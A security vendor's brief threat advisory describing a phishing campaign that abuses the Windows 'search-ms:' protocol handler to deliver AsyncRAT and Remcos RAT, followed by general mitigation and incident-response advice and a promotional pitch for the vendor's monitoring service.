Hackers Abusing Windows Search Feature to Install Remote Access Trojans
Unknown malicious actors are exploiting a legitimate Windows search feature to download arbitrary payloads from remote servers and compromise targeted systems with remote access trojans such as AsyncRAT and Remcos RAT. The attack technique uses the "search-ms:" URI protocol handler and the "search:" application protocol. Attackers are directing users to websites that exploit the 'search-ms' functionality using JavaScript hosted on the page. This technique has even been extended to HTML attachments, expanding the attack surface. In such attacks, threat actors have been observed creating deceptive emails that embed hyperlinks or HTML attachments containing a URL that redirects users to compromised websites.
Clicking on the link generates a warning "Open Windows Explorer?", approving which "the search results of remotely hosted malicious shortcut files are displayed in Windows Explorer disguised as PDFs or other trusted icons, just like local search results," the researchers explained. Should a victim click on one of the shortcut files, it leads to the execution of a rogue dynamic-link library (DLL) using the regsvr32.exe utility. The infections lead to the installation of AsyncRAT and Remcos RAT, offering a pathway for threat actors to remotely control the hosts, steal sensitive information, and even sell access to other threat actors.
Relevance
Phishing and Malware Campaigns
Mitigation
Avoid clicking on suspicious URLs or downloading HTML files from unknown sources
Avoid untrust worthy links practice hovering before clicking, analyze the URL, and avoid click bait
Enhance cybersecurity training for your team on how to spot potentially suspicious phishing campaigns
Incident Response
Isolate any infected systems and quarantine the system
Notify relevant parties according to your Incident Response Plan
Reach out to cybersecurity professionals to help contain the attack, analyze the risk, and devise a recovery plan.
References
1. The Hacker News. (2023, July 28). Hackers Abusing Windows Search Feature to Install Remote Access Trojans. https://thehackernews.com/2023/07/hackers-abusing-windows-search-feature.html
How can CyberForce|Q services help you address this risk?
Partner with CyberForce|Q to mitigate phishing and malware campaigns risk. Our cutting-edge Security Operations Center is purpose-bult to tackle the challenge of monitoring phishing attempts 24x7x265. By leveraging our services, we can help minimize the risk associated with phishing and malware campaigns with measurable results.
Comments